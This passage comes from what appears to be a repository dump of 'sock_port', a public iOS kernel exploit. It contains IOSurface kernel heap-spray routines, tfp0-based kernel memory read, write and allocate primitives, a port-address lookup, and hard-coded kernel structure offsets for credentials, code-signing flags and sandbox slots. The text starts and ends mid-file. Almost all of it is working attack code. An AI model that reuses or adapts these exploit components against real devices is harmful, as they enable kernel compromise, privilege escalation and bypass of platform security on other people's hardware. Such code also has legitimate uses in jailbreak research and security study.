encoded;\n}\n\n/*\n * xml_units_for_data_size\n *\n * Description:\n * \tReturn the number of XML units needed to store the given size of data in an OSString.\n */\nstatic size_t\nxml_units_for_data_size(size_t data_size) {\n\treturn ((data_size - 1) + sizeof(uint32_t) - 1) / sizeof(uint32_t);\n}\n\n/*\n * serialize_IOSurface_data_array\n *\n * Description:\n * \tCreate the template of the serialized array to pass to IOSurfaceUserClient::set_value().\n * \tReturns the size of the serialized data in bytes.\n */\nstatic size_t\nserialize_IOSurface_data_array(uint32_t *xml0, uint32_t array_length, uint32_t data_size,\n\t\tuint32_t **xml_data, uint32_t **key) {\n\tuint32_t *xml = xml0;\n\t*xml++ = kOSSerializeBinarySignature;\n\t*xml++ = kOSSerializeArray | 2 | kOSSerializeEndCollection;\n\t*xml++ = kOSSerializeArray | array_length;\n\tfor (size_t i = 0; i < array_length; i++) {\n\t\tuint32_t flags = (i == array_length - 1 ? kOSSerializeEndCollection : 0);\n\t\t*xml++ = kOSSerializeData | (data_size - 1) | flags;\n\t\txml_data[i] = xml;\n\t\txml += xml_units_for_data_size(data_size);\n\t}\n\t*xml++ = kOSSerializeSymbol | sizeof(uint32_t) + 1 | kOSSerializeEndCollection;\n\t*key = xml++;\t\t// This will be filled in on each array loop.\n\t*xml++ = 0;\t\t// Null-terminate the symbol.\n\treturn (xml - xml0) * sizeof(*xml);\n}\n\n/*\n * IOSurface_spray_with_gc_internal\n *\n * Description:\n * \tA generalized version of IOSurface_spray_with_gc() and IOSurface_spray_size_with_gc().\n */\n\nstatic uint32_t total_arrays = 0;\nstatic bool\nIOSurface_spray_with_gc_internal(uint32_t array_count, uint32_t array_length, uint32_t extra_count,\n\t\tvoid *data, uint32_t data_size,\n\t\tvoid (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)) {\n\tassert(array_count <= 0xffffff);\n\tassert(array_length <= 0xffff);\n\tassert(data_size <= 0xffffff);\n\tassert(extra_count < array_count);\n\t// Make sure our IOSurface is initialized.\n\tbool ok = IOSurface_init();\n\tif (!ok) {\n\t\treturn 0;\n\t}\n\t// How big will our OSUnserializeBinary dictionary be?\n\tuint32_t current_array_length = array_length + (extra_count > 0 ? 1 : 0);\n\tsize_t xml_units_per_data = xml_units_for_data_size(data_size);\n\tsize_t xml_units = 1 + 1 + 1 + (1 + xml_units_per_data) * current_array_length + 1 + 1 + 1;\n\t// Allocate the args struct.\n\tstruct IOSurfaceValueArgs *args;\n\tsize_t args_size = sizeof(*args) + xml_units * sizeof(args->xml[0]);\n\targs = malloc(args_size);\n\tassert(args != 0);\n\t// Build the IOSurfaceValueArgs.\n\targs->surface_id = IOSurface_id;\n\t// Create the serialized OSArray. We'll remember the locations we need to fill in with our\n\t// data as well as the slot we need to set our key.\n\tuint32_t **xml_data = malloc(current_array_length * sizeof(*xml_data));\n\tassert(xml_data != NULL);\n\tuint32_t *key;\n\tsize_t xml_size = serialize_IOSurface_data_array(args->xml,\n\t\t\tcurrent_array_length, data_size, xml_data, &key);\n\tassert(xml_size == xml_units * sizeof(args->xml[0]));\n\t// Keep track of when we need to do GC.\n\tsize_t sprayed = 0;\n\tsize_t next_gc_step = 0;\n\t// Loop through the arrays.\n\tfor (uint32_t array_id = 0; array_id < array_count; array_id++) {\n\t\t// If we've crossed the GC sleep boundary, sleep for a bit and schedule the\n\t\t// next one.\n\t\t// Now build the array and its elements.\n\t\t*key = base255_encode(total_arrays + array_id);\n\t\tfor (uint32_t data_id = 0; data_id < current_array_length; data_id++) {\n\t\t\t// Update the data for this spray if the user requested.\n\t\t\tif (callback != NULL) {\n\t\t\t\tcallback(array_id, data_id, data, data_size);\n\t\t\t}\n\t\t\t// Copy in the data to the appropriate slot.\n\t\t\tmemcpy(xml_data[data_id], data, data_size - 1);\n\t\t}\n\t\t// Finally set the array in the surface.\n\t\tok = IOSurface_set_value(args, args_size);\n\t\tif (!ok) {\n\t\t\tfree(args);\n\t\t\tfree(xml_data);\n\t\t\treturn false;\n\t\t}\n\t\tif (ok) {\n\t\t\tsprayed += data_size * current_array_length;\n\t\t\t// If we just sprayed an array with an extra element, decrement the\n\t\t\t// outstanding extra_count.\n\t\t\tif (current_array_length > array_length) {\n\t\t\t\tassert(extra_count > 0);\n\t\t\t\textra_count--;\n\t\t\t\t// If our extra_count is now 0, rebuild our serialized array. (We\n\t\t\t\t// could implement this as a memmove(), but I'm lazy.)\n\t\t\t\tif (extra_count == 0) {\n\t\t\t\t\tcurrent_array_length--;\n\t\t\t\t\tserialize_IOSurface_data_array(args->xml,\n\t\t\t\t\t\t\tcurrent_array_length, data_size,\n\t\t\t\t\t\t\txml_data, &key);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\tif (next_gc_step > 0) {\n\t\t// printf(\"\\n\");\n\t}\n\t// Clean up resources.\n\tfree(args);\n\tfree(xml_data);\n\ttotal_arrays += array_count;\n\treturn true;\n}\n\nbool\nIOSurface_spray_with_gc(uint32_t array_count, uint32_t array_length,\n\t\tvoid *data, uint32_t data_size,\n\t\tvoid (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)) {\n\treturn IOSurface_spray_with_gc_internal(array_count, array_length, 0,\n\t\t\tdata, data_size, callback);\n}\n\nbool\nIOSurface_spray_size_with_gc(uint32_t array_count, size_t spray_size,\n\t\tvoid *data, uint32_t data_size,\n\t\tvoid (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)) {\n\tassert(array_count <= 0xffffff);\n\tassert(data_size <= 0xffffff);\n\tsize_t data_count = (spray_size + data_size - 1) / data_size;\n\tsize_t array_length = data_count / array_count;\n\tsize_t extra_count = data_count % array_count;\n\tassert(array_length <= 0xffff);\n\treturn IOSurface_spray_with_gc_internal(array_count, (uint32_t) array_length,\n\t\t\t(uint32_t) extra_count, data, data_size, callback);\n}\n\nbool\nIOSurface_spray_read_array(uint32_t array_id, uint32_t array_length, uint32_t data_size,\n\t\tvoid (^callback)(uint32_t data_id, void *data, size_t size)) {\n\tassert(IOSurface_initialized);\n\tassert(array_id < 0xffffff);\n\tassert(array_length <= 0xffff);\n\tassert(data_size <= 0xffffff);\n\tbool success = false;\n\t// Create the input args.\n\tstruct IOSurfaceValueArgs_string args_in = {};\n\targs_in.surface_id = IOSurface_id;\n\targs_in.string_data = base255_encode(array_id);\n\t// Create the output args.\n\tsize_t xml_units_per_data = xml_units_for_data_size(data_size);\n\tsize_t xml_units = 1 + 1 + (1 + xml_units_per_data) * array_length;\n\tstruct IOSurfaceValueArgs *args_out;\n\tsize_t args_out_size = sizeof(*args_out) + xml_units * sizeof(args_out->xml[0]);\n\t// Over-allocate the output buffer a little bit. This allows us to directly pass the inline\n\t// data to the client without having to worry about the fact that the kernel data is 1 byte\n\t// shorter (which otherwise would produce an out-of-bounds read on the last element for\n\t// certain data sizes). Yeah, it's a hack, deal with it.\n\targs_out = malloc(args_out_size + sizeof(uint32_t));\n\tassert(args_out != 0);\n\t// Get the value.\n\tbool ok = IOSurface_get_value((struct IOSurfaceValueArgs *)&args_in, sizeof(args_in),\n\t\t\targs_out, &args_out_size);\n\tif (!ok) {\n\t\tgoto fail;\n\t}\n\t// Do the ugly parsing ourselves. :(\n\tuint32_t *xml = args_out->xml;\n\tif (*xml++ != kOSSerializeBinarySignature) {\n\t\tERROR(\"IOSurface: did not find OSSerializeBinary signature\");\n\t\tgoto fail;\n\t}\n\tif (*xml++ != (kOSSerializeArray | array_length | kOSSerializeEndCollection)) {\n\t\tERROR(\"IOSurface: unexpected container\");\n\t\tgoto fail;\n\t}\n\tfor (uint32_t data_id = 0; data_id < array_length; data_id++) {\n\t\tuint32_t flags = (data_id == array_length - 1 ? kOSSerializeEndCollection : 0);\n\t\tif (*xml++ != (kOSSerializeString | data_size - 1 | flags)) {\n ERROR(\"IOSurface: unexpected data: 0x%x != 0x%x at index %u\",\n\t\t\t\t\txml[-1], kOSSerializeString | data_size - 1 | flags,\n\t\t\t\t\tdata_id);\n\t\t\tgoto fail;\n\t\t}\n\t\tcallback(data_id, (void *)xml, data_size);\n\t\txml += xml_units_per_data;\n\t}\n\tsuccess = true;\nfail:\n\tfree(args_out);\n\treturn success;\n}\n\nbool\nIOSurface_spray_read_all_data(uint32_t array_count, uint32_t array_length, uint32_t data_size,\n\t\tvoid (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)) {\n\tassert(IOSurface_initialized);\n\tassert(array_count <= 0xffffff);\n\tassert(array_length <= 0xffff);\n\tassert(data_size <= 0xffffff);\n\tbool ok = true;\n\t//TODO: We should probably amortize the creation of the output buffer.\n\tfor (uint32_t array_id = 0; array_id < array_count; array_id++) {\n\t\tok &= IOSurface_spray_read_array(array_id, array_length, data_size,\n\t\t\t\t^(uint32_t data_id, void *data, size_t size) {\n\t\t\tcallback(array_id, data_id, data, size);\n\t\t});\n\t}\n\treturn ok;\n}\n\nbool\nIOSurface_spray_remove_array(uint32_t array_id) {\n\tassert(IOSurface_initialized);\n\tassert(array_id < 0xffffff);\n\tstruct IOSurfaceValueArgs_string args = {};\n\targs.surface_id = IOSurface_id;\n\targs.string_data = base255_encode(array_id);\n\treturn IOSurface_remove_value((struct IOSurfaceValueArgs *)&args, sizeof(args));\n}\n\nbool\nIOSurface_spray_clear(uint32_t array_count) {\n\tassert(IOSurface_initialized);\n\tassert(array_count <= 0xffffff);\n\tbool ok = true;\n\tfor (uint32_t array_id = 0; array_id < array_count; array_id++) {\n\t\tok &= IOSurface_spray_remove_array(array_id);\n\t}\n\treturn ok;\n}\n" }, { "path": "Exploits/sock_port/iosurface.h", "content": "/*\n * iosurface.h\n * Brandon Azad\n */\n#ifndef VOUCHER_SWAP__IOSURFACE_H_\n#define VOUCHER_SWAP__IOSURFACE_H_\n\n#include \n#include \n#include \n#include \n#include \n#include \n#include \"../sock_port/include/IOKit/IOKitLib.h\"\n\n#include \"exploit_utilities.h\"\n\n#ifdef IOSURFACE_EXTERN\n#define extern IOSURFACE_EXTERN\n#endif\n\n// The IOSurfaceRoot service.\nextern mach_port_t IOSurfaceRoot;\n\n// An IOSurfaceRootUserClient instance.\nextern mach_port_t IOSurfaceRootUserClient;\n\n// The ID of the IOSurface we're using.\nextern uint32_t IOSurface_id;\n\n/*\n * IOSurface_init\n *\n * Description:\n * \tInitialize the IOSurface subsystem.\n */\nbool IOSurface_init(void);\n\n/*\n * IOSurface_deinit\n *\n * Description:\n * \tTear down the IOSurface subsystem. Any sprayed memory will be automatically deallocated.\n */\nvoid IOSurface_deinit(void);\n\n/*\n * IOSurface_spray_with_gc\n *\n * Description:\n * \tSpray kernel memory using IOSurface properties.\n *\n * \tThe current implementation stores each data allocation in an OSString. The reason for this\n * \tis that OSString contents will be allocated using kalloc() even for allocations larger than\n * \tthe page size. OSData on the other hand will use kmem_alloc() for large allocations.\n * \tConsequently, the last byte of data will be zeroed out to create a null terminator.\n */\nbool IOSurface_spray_with_gc(uint32_t array_count, uint32_t array_length,\n\t\tvoid *data, uint32_t data_size,\n\t\tvoid (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size));\n\n/*\n * IOSurface_spray_size_with_gc\n *\n * Description:\n * \tSpray kernel memory using IOSurface properties.\n *\n * \tThis function computes the number of elements per array automatically.\n */\nbool IOSurface_spray_size_with_gc(uint32_t array_count, size_t spray_size,\n\t\tvoid *data, uint32_t data_size,\n\t\tvoid (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size));\n\n/*\n * IOSurface_spray_read_array\n *\n * Description:\n * \tRead back the data elements in a particular array in a particular IOSurface spray.\n */\nbool IOSurface_spray_read_array(uint32_t array_id, uint32_t array_length, uint32_t data_size,\n\t\tvoid (^callback)(uint32_t data_id, void *data, size_t size));\n\n/*\n * IOSurface_spray_read_all_data\n *\n * Description:\n * \tRead back all the data elements in an IOSurface spray.\n */\nbool IOSurface_spray_read_all_data(uint32_t array_count, uint32_t array_length, uint32_t data_size,\n\t\tvoid (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size));\n\n/*\n * IOSurface_spray_remove_array\n *\n * Description:\n * \tRemove a particular array from an IOSurface spray, freeing the contained data elements.\n */\nbool IOSurface_spray_remove_array(uint32_t array_id);\n\n/*\n * IOSurface_spray_clear\n *\n * Description:\n * \tRemove all the arrays from an IOSurface spray, freeing all the data elements.\n */\nbool IOSurface_spray_clear(uint32_t array_count);\n\n// ---- IOSurface types ---------------------------------------------------------------------------\n\nstruct _IOSurfaceFastCreateArgs {\n uint64_t address;\n uint32_t width;\n uint32_t height;\n uint32_t pixel_format;\n uint32_t bytes_per_element;\n uint32_t bytes_per_row;\n uint32_t alloc_size;\n};\n\nstruct IOSurfaceLockResult {\n uint64_t addr1;\n uint64_t addr2;\n uint64_t addr3;\n uint32_t surface_id;\n uint8_t _pad2[0xdd0-0x18-0x4];\n};\n\nstruct IOSurfaceValueArgs {\n uint32_t surface_id;\n uint32_t _out1;\n union {\n uint32_t xml[0];\n char string[0];\n };\n};\n\nstruct IOSurfaceValueArgs_string {\n uint32_t surface_id;\n uint32_t _out1;\n uint32_t string_data;\n char null;\n};\n\nstruct IOSurfaceValueResultArgs {\n uint32_t out;\n};\n\n\nbool IOSurface_set_value(const struct IOSurfaceValueArgs *args, size_t args_size);\n\n#undef extern\n\n#endif\n" }, { "path": "Exploits/sock_port/kernel_memory.c", "content": "//\n// kernel_memory.c\n// sock_port\n//\n// Created by Jake James on 7/18/19.\n// Copyright © 2019 Jake James. All rights reserved.\n//\n\n#include \"kernel_memory.h\"\n\nstatic mach_port_t tfpzero;\n\nvoid init_kernel_memory(mach_port_t tfp0) {\n tfpzero = tfp0;\n}\n\nuint64_t kalloc(vm_size_t size) {\n mach_vm_address_t address = 0;\n mach_vm_allocate(tfpzero, (mach_vm_address_t *)&address, size, VM_FLAGS_ANYWHERE);\n return address;\n}\n\nvoid kfree(mach_vm_address_t address, vm_size_t size) {\n mach_vm_deallocate(tfpzero, address, size);\n}\n\nsize_t kread(uint64_t where, void *p, size_t size) {\n int rv;\n size_t offset = 0;\n while (offset < size) {\n mach_vm_size_t sz, chunk = 2048;\n if (chunk > size - offset) {\n chunk = size - offset;\n }\n rv = mach_vm_read_overwrite(tfpzero, where + offset, chunk, (mach_vm_address_t)p + offset, &sz);\n if (rv || sz == 0) {\n printf(\"Kernel Memory: error on kread(0x%016llx)\\n\", where);\n break;\n }\n offset += sz;\n }\n return offset;\n}\n\nuint32_t rk32(uint64_t where) {\n uint32_t out;\n kread(where, &out, sizeof(uint32_t));\n return out;\n}\n\nuint64_t rk64(uint64_t where) {\n uint64_t out;\n kread(where, &out, sizeof(uint64_t));\n return out;\n}\n\nsize_t kwrite(uint64_t where, const void *p, size_t size) {\n int rv;\n size_t offset = 0;\n while (offset < size) {\n size_t chunk = 2048;\n if (chunk > size - offset) {\n chunk = size - offset;\n }\n rv = mach_vm_write(tfpzero, where + offset, (mach_vm_offset_t)p + offset, (int)chunk);\n if (rv) {\n printf(\"Kernel Memory: error on kwrite(0x%016llx)\\n\", where);\n break;\n }\n offset += chunk;\n }\n return offset;\n}\n\nvoid wk32(uint64_t where, uint32_t what) {\n uint32_t _what = what;\n kwrite(where, &_what, sizeof(uint32_t));\n}\n\n\nvoid wk64(uint64_t where, uint64_t what) {\n uint64_t _what = what;\n kwrite(where, &_what, sizeof(uint64_t));\n}\n\nuint64_t find_port(mach_port_name_t port, uint64_t task_self) {\n uint64_t task_addr = rk64(task_self + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));\n uint64_t itk_space = rk64(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE));\n uint64_t is_table = rk64(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE));\n \n uint32_t port_index = port >> 8;\n const int sizeof_ipc_entry_t = 0x18;\n \n uint64_t port_addr = rk64(is_table + (port_index * sizeof_ipc_entry_t));\n \n return port_addr;\n}\n" }, { "path": "Exploits/sock_port/kernel_memory.h", "content": "//\n// kernel_memory.h\n// sock_port\n//\n// Created by Jake James on 7/18/19.\n// Copyright © 2019 Jake James. All rights reserved.\n//\n\n#ifndef kernel_memory_h\n#define kernel_memory_h\n\n#include \n#include \n#include \"offsets.h\"\n\nkern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);\nkern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);\nkern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);\nkern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t address, mach_vm_size_t size);;\nkern_return_t mach_vm_read(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, vm_offset_t *data, mach_msg_type_number_t *dataCnt);\n\nvoid init_kernel_memory(mach_port_t tfp0);\n\nsize_t kread(uint64_t where, void *p, size_t size);\nuint32_t rk32(uint64_t where);\nuint64_t rk64(uint64_t where);\n\nsize_t kwrite(uint64_t where, const void *p, size_t size);\nvoid wk32(uint64_t where, uint32_t what);\nvoid wk64(uint64_t where, uint64_t what);\n\nvoid kfree(mach_vm_address_t address, vm_size_t size);\nuint64_t kalloc(vm_size_t size);\n\nuint64_t find_port(mach_port_name_t port, uint64_t task_self);\n\n#endif /* kernel_memory_h */\n" }, { "path": "Exploits/sock_port/offsetof.c", "content": "unsigned off_p_pid = 0x10; // proc_t::p_pid\nunsigned off_task = 0x18; // proc_t::task\nunsigned off_p_uid = 0x30; // proc_t::p_uid\nunsigned off_p_gid = 0x34; // proc_t::p_uid\nunsigned off_p_ruid = 0x38; // proc_t::p_uid\nunsigned off_p_rgid = 0x3c; // proc_t::p_uid\nunsigned off_p_ucred = 0x100; // proc_t::p_ucred\nunsigned off_p_fd = 0x108; // proc_t::p_fd\nunsigned off_p_csflags = 0x2a8; // proc_t::p_csflags\nunsigned off_p_comm = 0x268; // proc_t::p_comm\nunsigned off_p_textvp = 0x248; // proc_t::p_textvp\nunsigned off_p_textoff = 0x250; // proc_t::p_textoff\nunsigned off_p_cputype = 0x2c0; // proc_t::p_cputype\nunsigned off_p_cpu_subtype = 0x2c4; // proc_t::p_cpu_subtype\n\nunsigned off_itk_self = 0xD8; // task_t::itk_self (convert_task_to_port)\nunsigned off_itk_sself = 0xE8; // task_t::itk_sself (task_get_special_port)\nunsigned off_itk_bootstrap = 0x2b8; // task_t::itk_bootstrap (task_get_special_port)\nunsigned off_itk_space = 0x308; // task_t::itk_space\n\nunsigned off_ip_mscount = 0x9C; // ipc_port_t::ip_mscount (ipc_port_make_send)\nunsigned off_ip_srights = 0xA0; // ipc_port_t::ip_srights (ipc_port_make_send)\nunsigned off_ip_kobject = 0x68; // ipc_port_t::ip_kobject\n\nunsigned off_special = 2 * sizeof(long); // host::special\nunsigned off_ipc_space_is_table = 0x20; // ipc_space::is_table?..\n\nunsigned off_ucred_cr_uid = 0x18; // ucred::cr_uid\nunsigned off_ucred_cr_ruid = 0x1c; // ucred::cr_ruid\nunsigned off_ucred_cr_svuid = 0x20; // ucred::cr_svuid\nunsigned off_ucred_cr_ngroups = 0x24; // ucred::cr_ngroups\nunsigned off_ucred_cr_groups = 0x28; // ucred::cr_groups\nunsigned off_ucred_cr_rgid = 0x68; // ucred::cr_rgid\nunsigned off_ucred_cr_svgid = 0x6c; // ucred::cr_svgid\nunsigned off_ucred_cr_label = 0x78; // ucred::cr_label\n\nunsigned off_amfi_slot = 0x8;\nunsigned off_sandbox_slot = 0x10;\n\nunsigned off_v_type = 0x70; // vnode::v_type\nunsigned off_v_id = 0x74; // vnode::v_id\nunsigned off_v_ubcinfo = 0x78; // vnode::v_ubcinfo\nunsigned off_v_flags = 0x54; // vnode::v_flags\n\nunsigned off_ubcinfo_csblobs = 0x50; // ubc_info::csblobs\n\nunsigned off_csb_cputype = 0x8; // cs_blob::csb_cputype\nunsigned off_csb_flags = 0x12; // cs_blob::csb_flags\nunsigned off_csb_base_offset = 0x16; // cs_blob::csb_base_offset\nunsigned off_csb_entitlements_offset = 0x90; // cs_blob::csb_entitlements\nunsigned off_csb_signer_type = 0xA0; // cs_blob::csb_signer_type\nunsigned off_csb_platform_binary = 0xA4; // cs_blob::csb_platform_binary\nunsigned off_csb_platform_path = 0xA8; // cs_blob::csb_platform_path\nunsigned off_csb_cd = 0x80; // cs_blob::csb_cd\nunsigned off_si_flags = 0x10;\nunsigned off_t_flags = 0x3a0; // task::t_flags\n\nunsigned off_v_mount = 0xd8; // vnode::v_mount\nunsigned off_v_specinfo = 0x78; // vnode::v_specinfo\nunsigned off_specflags = 0x10;\nunsigned off_mnt_flag = 0x70; // mount::mnt_flag\nunsigned off_mnt_data = 0x8f8; // mount::mnt_data\n\nunsigned off_getExternelTrapForIndex = 0xb7; // IOUserClient::getExternalTrapForIndex\n" }, { "path": "Exploits/sock_port/offsetof.h", "content": "\nextern unsigned off_p_pid;\nextern unsigned off_task;\nextern unsigned off_p_uid;\nextern unsigned off_p_gid;\nextern unsigned off_p_ruid;\nextern unsigned off_p_rgid;\nextern unsigned off_p_ucred;\nextern unsigned off_p_fd;\nextern unsigned off_p_csflags;\nextern unsigned off_p_comm;\n\nextern unsigned off_itk_self;\nextern unsigned off_itk_sself;\nextern unsigned off_itk_bootstrap;\nextern unsigned off_itk_space;\nextern unsigned off_ip_mscount;\nextern unsigned off_ip_srights;\nextern unsigned off_ip_kobject;\nextern unsigned off_p_textvp;\nextern unsigned off_p_textoff;\nextern unsigned off_p_cputype;\nextern unsigned off_p_cpu_subtype;\nextern unsigned off_special;\nextern unsigned off_ipc_space_is_table;\nextern unsigned off_si_flags;\nextern unsigned off_ucred_cr_uid;\nextern unsigned off_ucred_cr_ruid;\nextern unsigned off_ucred_cr_gid;\nextern unsigned off_ucred_cr_rgid;\nextern unsigned off_ucred_cr_svgid;\nextern unsigned off_ucred_cr_groups;\nextern unsigned off_ucred_cr_ngroups;\nextern unsigned off_ucred_cr_svuid;\nextern unsigned off_ucred_cr_label;\n\nextern unsigned off_amfi_slot;\nextern unsigned off_sandbox_slot;\n\nextern unsigned off_v_type;\nextern unsigned off_v_id;\nextern unsigned off_v_ubcinfo;\nextern unsigned off_v_flags;\n\nextern unsigned off_ubcinfo_csblobs;\n\nextern unsigned off_csb_cputype;\nextern unsigned off_csb_flags;\nextern unsigned off_csb_base_offset;\nextern unsigned off_csb_entitlements_offset;\nextern unsigned off_csb_signer_type;\nextern unsigned off_csb_platform_binary;\nextern unsigned off_csb_platform_path;\nextern unsigned off_csb_cd;\n\nextern unsigned off_t_flags;\n\nextern unsigned off_v_mount;\nextern unsigned off_v_specinfo;\nextern unsigned off_specflags;\nextern unsigned off_mnt_flag;\nextern unsigned off_mnt_data;\n\nextern unsigned off_getExternelTrapForIndex;\n\n#define\tCS_VALID\t\t0x0000001\t/* dynamically valid */\n#define CS_ADHOC\t\t0x0000002\t/* ad hoc signed */\n#define CS_GET_TASK_ALLOW\t0x0000004\t/* has get-task-allow entitlement */\n#define CS_INSTALLER\t\t0x0000008\t/* has installer entitlement */\n\n#define\tCS_HARD\t\t\t0x0000100\t/* don't load invalid pages */\n#define\tCS_KILL\t\t\t0x0000200\t/* kill process if it becomes invalid */\n#define CS_CHECK_EXPIRATION\t0x0000400\t/* force expiration checking */\n#define CS_RESTRICT\t\t0x0000800\t/* tell dyld to treat restricted */\n#define CS_ENFORCEMENT\t\t0x0001000\t/* require enforcement */\n#define CS_REQUIRE_LV\t\t0x0002000\t/* require library validation */\n#define CS_ENTITLEMENTS_VALIDATED\t0x0004000\n\n#define\tCS_ALLOWED_MACHO\t0x00ffffe\n\n#define CS_EXEC_SET_HARD\t0x0100000\t/* set CS_HARD on any exec'ed process */\n#define CS_EXEC_SET_KILL\t0x0200000\t/* set CS_KILL on any exec'ed process */\n#define CS_EXEC_SET_ENFORCEMENT\t0x0400000\t/* set CS_ENFORCEMENT on any exec'ed process */\n#define CS_EXEC_SET_INSTALLER\t0x0800000\t/* set CS_INSTALLER on any exec'ed process */\n\n#define CS_KILLED\t\t0x1000000\t/* was killed by kernel for invalidity */\n#define CS_DYLD_PLATFORM\t0x2000000\t/* dyld used to load this is a platform binary */\n#define CS_PLATFORM_BINARY\t0x4000000\t/* this is a platform binary */\n#define CS_PLATFORM_PATH\t0x8000000\t/* platform binary by the fact of path (osx only) */\n\n#define CS_DEBUGGED 0x10000000 /* process is currently or has previously been debugged and allowed to run with invalid pages */\n#define CS_SIGNED 0x20000000 /* process has a signature (may have gone invalid) */\n#define CS_DEV_CODE 0x40000000 /* code is dev signed, cannot be loaded into prod signed code (will go away with rdar://problem/28322552) */\n\n" }, { "path": "Exploits/sock_port/offsets.h", "content": "#ifndef offsets_h\n#define offsets_h\n\nenum kstruct_offset {\n /* struct task */\n KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,\n KSTRUCT_OFFSET_TASK_REF_COUNT,\n KSTRUCT_OFFSET_TASK_ACTIVE,\n KSTRUCT_OFFSET_TASK_VM_MAP,\n KSTRUCT_OFFSET_TASK_NEXT,\n KSTRUCT_OFFSET_TASK_PREV,\n KSTRUCT_OFFSET_TASK_ITK_SELF,\n KSTRUCT_OFFSET_TASK_ITK_SPACE,\n KSTRUCT_OFFSET_TASK_BSD_INFO,\n \n /* struct ipc_port */\n KSTRUCT_OFFSET_IPC_PORT_IO_BITS,\n KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,\n KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,\n KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,\n KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,\n KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,\n KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,\n KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,\n KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,\n \n /* struct proc */\n KSTRUCT_OFFSET_PROC_PID,\n KSTRUCT_OFFSET_PROC_P_FD,\n \n /* struct filedesc */\n KSTRUCT_OFFSET_FILEDESC_FD_OFILES,\n \n /* struct fileproc */\n KSTRUCT_OFFSET_FILEPROC_F_FGLOB,\n \n /* struct fileglob */\n KSTRUCT_OFFSET_FILEGLOB_FG_DATA,\n \n /* struct socket */\n KSTRUCT_OFFSET_SOCKET_SO_PCB,\n \n /* struct pipe */\n KSTRUCT_OFFSET_PIPE_BUFFER,\n \n /* struct ipc_space */\n KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE,\n KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE,\n \n KFREE_ADDR_OFFSET,\n};\n\nint koffset(enum kstruct_offset offset);\nvoid offsets_init(void);\n\nextern uint32_t create_outsize;\n#endif \n" }, { "path": "Exploits/sock_port/offsets.m", "content": "#import \n#import \n\n#import \n#import \n#import \n#import \n#import \n\n#import \"offsets.h\"\n\n#define SYSTEM_VERSION_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedSame)\n#define SYSTEM_VERSION_GREATER_THAN(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedDescending)\n#define SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] != NSOrderedAscending)\n#define SYSTEM_VERSION_LESS_THAN(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedAscending)\n#define SYSTEM_VERSION_LESS_THAN_OR_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] != NSOrderedDescending)\n\nint* offsets = NULL;\n// proc_t\nint kstruct_offsets_10_x[] = {\n 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,\n 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT,\n 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE,\n 0x20, // KSTRUCT_OFFSET_TASK_VM_MAP,\n 0x28, // KSTRUCT_OFFSET_TASK_NEXT,\n 0x30, // KSTRUCT_OFFSET_TASK_PREV,\n 0xd8, // KSTRUCT_OFFSET_TASK_ITK_SELF,\n 0x300, // KSTRUCT_OFFSET_TASK_ITK_SPACE,\n 0x360, // KSTRUCT_OFFSET_TASK_BSD_INFO,\n \n 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,\n 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,\n 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,\n 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,\n 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,\n 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,\n 0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,\n 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,\n 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,\n \n 0x10, // KSTRUCT_OFFSET_PROC_PID,\n 0x108, // KSTRUCT_OFFSET_PROC_P_FD\n \n 0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES\n \n 0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB\n \n 0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA\n \n 0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB\n \n 0x10, // KSTRUCT_OFFSET_PIPE_BUFFER\n \n 0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE\n 0x20, // 